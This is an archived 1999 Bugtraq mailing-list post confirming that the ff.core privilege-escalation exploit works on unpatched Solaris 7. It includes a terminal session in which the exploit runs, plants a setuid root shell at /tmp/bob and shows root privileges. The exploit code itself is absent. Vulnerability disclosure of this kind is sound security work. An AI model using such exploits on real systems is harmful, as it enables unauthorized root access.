[9012] in bugtraq

home help back first fref pref prev next nref lref last post

ff.core exploit on Solaris (2.)7

daemon@ATHENA.MIT.EDU (Daniel J. Frasnelli)
Sat Jan 9 15:38:18 1999

Date: 	Fri, 8 Jan 1999 12:43:20 -0500
Reply-To: "Daniel J. Frasnelli" <dfrasnel@CSEE.WVU.EDU>
From: "Daniel J. Frasnelli" <dfrasnel@CSEE.WVU.EDU>
X-To:         John McDonald <jmcdonal@UNF.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.OSF.4.05.9901070946310.11222-100000@osprey.unf.edu>

Greetings,
        Confirmed ff.core exploit does exist in Solaris 7, server
edition.  System is straight installation, no patches of any category
available for 7 from Sunsolve yet.

Daniel

(12:32,99-01-08)
(dfrasnel@rogue)[~]> uname -spr
SunOS 5.7 sparc

(12:34,99-01-08)
(dfrasnel@rogue)[~]> ./test
Testing if exploit is possible...
Test successful. Proceeding...
Backing up clobbered files to /tmp/.bk
Doing sploit...
Done with sploit. Testing and trying to clean up now...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Connection closed by foreign host.
w00p! Should have a suid root sh in /tmp/bob
btw, its rksh because solaris is silly
Let me try to clean up my mess...
everything should be cool.. i think :>
# ls -la /tmp/bob
-rwsr-xr-x   1 root     root      192764 Jan  8 12:32 /tmp/bob
# id
(snip) euid=0(root)

home help back first fref pref prev next nref lref last post